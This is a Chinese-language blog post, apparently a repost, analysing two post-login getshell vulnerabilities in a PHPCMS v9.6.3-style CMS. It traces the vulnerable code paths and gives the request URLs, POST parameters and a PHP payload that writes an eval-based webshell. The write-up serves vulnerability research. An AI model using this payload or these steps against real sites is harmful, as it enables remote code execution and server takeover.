某cmsv9.6.3之后台几处漏洞分析

admin 2024年1月16日08:34:48评论31 views字数 4486阅读14分57秒阅读模式

后台GETSHELL

某cmsv9.6.3之后台几处漏洞分析

首先全局搜一下调用include或者require的地方

某cmsv9.6.3之后台几处漏洞分析

跟进到

if (@file_put_contents($filepath,$str)) {
ob_start();
include $filepath;
$html = ob_get_contents();
ob_clean();
@unlink($filepath);
}

往上走

$str = $tpl->template_parse(new_stripslashes($template));

字符串是从这里取出,往上走

$template = isset($_POST['template']) && trim($_POST['template']) ? trim($_POST['template']) : '';

直接post过数据来,没经过任何处理,那么只要构造一下传过恶意数据来即可。

首先向

http://www.test.com/phpcms/install_package/index.php?m=block&c=block_admin&pc_hash=B8mgrw&a=add&pos=1

post:

dosubmit=1&name=ac&type=2

然后填入payload

<?php file_put_contents("phpcms_shell.php","<?php eval($_POST[1]);?>");

某cmsv9.6.3之后台几处漏洞分析

某cmsv9.6.3之后台几处漏洞分析

GETSHELL(二)

另外一个地方是利用cache处的编译,因为没有限制模板文件路径,导致只要有可控的html页面,即可到达include实现getshell。

首先看modulesadmincategory.php

$setting = $_POST['setting'];
if($_POST['info']['type']!=2) {
//栏目生成静态配置
if($setting['ishtml']) {
$setting['category_ruleid'] = $_POST['category_html_ruleid'];
} else {
$setting['category_ruleid'] = $_POST['category_php_ruleid'];
$_POST['info']['url'] = '';
}
}

//内容生成静态配置
if($setting['content_ishtml']) {
$setting['show_ruleid'] = $_POST['show_html_ruleid'];
} else {
$setting['show_ruleid'] = $_POST['show_php_ruleid'];
}
if($setting['repeatchargedays']<1) $setting['repeatchargedays'] = 1;
$_POST['info']['sethtml'] = $setting['create_to_html_root'];
//die(print_r($setting));
$_POST['info']['setting'] = array2string($setting);
die(print_r($_POST['info']));
$end_str = $old_end = '<script type="text/javascript">window.top.art.dialog({id:"test"}).close();window.top.art.dialog({id:"test",content:'<h2>'.L("add_success").'</h2><span style="fotn-size:16px;">'.L("following_operation").'</span><br /><ul style="fotn-size:14px;"><li><a href="?m=admin&c=category&a=public_cache&menuid=43&module=admin" target="right" onclick="window.top.art.dialog({id:\'test\'}).close()">'.L("following_operation_1").'</a></li><li><a href="'.HTTP_REFERER.'" target="right" onclick="window.top.art.dialog({id:\'test\'}).close()">'.L("following_operation_2").'</a></li></ul>',width:"400",height:"200"});</script>';
if(!isset($_POST['batch_add']) || empty($_POST['batch_add'])) {
$catname = CHARSET == 'gbk' ? $_POST['info']['catname'] : iconv('utf-8','gbk',$_POST['info']['catname']);
$letters = gbk_to_pinyin($catname);
$_POST['info']['letter'] = strtolower(implode('', $letters));
$catid = $this->db->insert($_POST['info'], true);

setting信息没有经过任何处理直接插入数据库,也就是达到了上文没有限制模板文件路径。

那么继续往下找,setting[page_template]字段既然有入库操作,必然有出库操作。

全局搜索一下

某cmsv9.6.3之后台几处漏洞分析

跟进第一处,往下走看到

include template('content',$template);

跟进template函数,在libsfunctionsglobals.func.php,主要代码如下

$compiledtplfile = PHPCMS_PATH.'caches'.DIRECTORY_SEPARATOR.'caches_template'.DIRECTORY_SEPARATOR.$style.DIRECTORY_SEPARATOR.$module.DIRECTORY_SEPARATOR.$template.'.php';
if(file_exists(PC_PATH.'templates'.DIRECTORY_SEPARATOR.$style.DIRECTORY_SEPARATOR.$module.DIRECTORY_SEPARATOR.$template.'.html')) {
if(!file_exists($compiledtplfile) || (@filemtime(PC_PATH.'templates'.DIRECTORY_SEPARATOR.$style.DIRECTORY_SEPARATOR.$module.DIRECTORY_SEPARATOR.$template.'.html') > @filemtime($compiledtplfile))) {
$template_cache->template_compile($module, $template, $style);
}
} else {
$compiledtplfile = PHPCMS_PATH.'caches'.DIRECTORY_SEPARATOR.'caches_template'.DIRECTORY_SEPARATOR.'default'.DIRECTORY_SEPARATOR.$module.DIRECTORY_SEPARATOR.$template.'.php';
if(!file_exists($compiledtplfile) || (file_exists(PC_PATH.'templates'.DIRECTORY_SEPARATOR.'default'.DIRECTORY_SEPARATOR.$module.DIRECTORY_SEPARATOR.$template.'.html') && filemtime(PC_PATH.'templates'.DIRECTORY_SEPARATOR.'default'.DIRECTORY_SEPARATOR.$module.DIRECTORY_SEPARATOR.$template.'.html') > filemtime($compiledtplfile))) {
$template_cache->template_compile($module, $template, 'default');
} elseif (!file_exists(PC_PATH.'templates'.DIRECTORY_SEPARATOR.'default'.DIRECTORY_SEPARATOR.$module.DIRECTORY_SEPARATOR.$template.'.html')) {
showmessage('Template does not exist.'.DIRECTORY_SEPARATOR.$style.DIRECTORY_SEPARATOR.$module.DIRECTORY_SEPARATOR.$template.'.html');
}
}

就是一个编译的过程,继续跟入template_compile,主要代码如下

$content = @file_get_contents ( $tplfile );

$filepath = CACHE_PATH.'caches_template'.DIRECTORY_SEPARATOR.$style.DIRECTORY_SEPARATOR.$module.DIRECTORY_SEPARATOR;
if(!is_dir($filepath)) {
mkdir($filepath, 0777, true);
}
$compiledtplfile = $filepath.$template.'.php';
$content = $this->template_parse($content);
$strlen = file_put_contents ( $compiledtplfile, $content );

tpfile=>page_template,然后就是编译成php的过程,现在即可到达include实现这个条件也达成,然后只是去找个可控的html文件。

可控的html文件比较多,如下

某cmsv9.6.3之后台几处漏洞分析

某cmsv9.6.3之后台几处漏洞分析

结合上面

某cmsv9.6.3之后台几处漏洞分析

因为burp不方便直接抓包,先提交然后看history

某cmsv9.6.3之后台几处漏洞分析

然后找到catid

某cmsv9.6.3之后台几处漏洞分析

访问

http://www.test.com/phpcms_v9.6.3_UTF8/install_package/index.php?m=content&c=index&a=lists&catid=15

即可getshell。

来源:https://xz.aliyun.com/  感谢【p0desta


原文始发于微信公众号(船山信安):某cmsv9.6.3之后台几处漏洞分析

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年1月16日08:34:48
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   某cmsv9.6.3之后台几处漏洞分析https://cn-sec.com/archives/2397676.html

发表评论

匿名网友 填写信息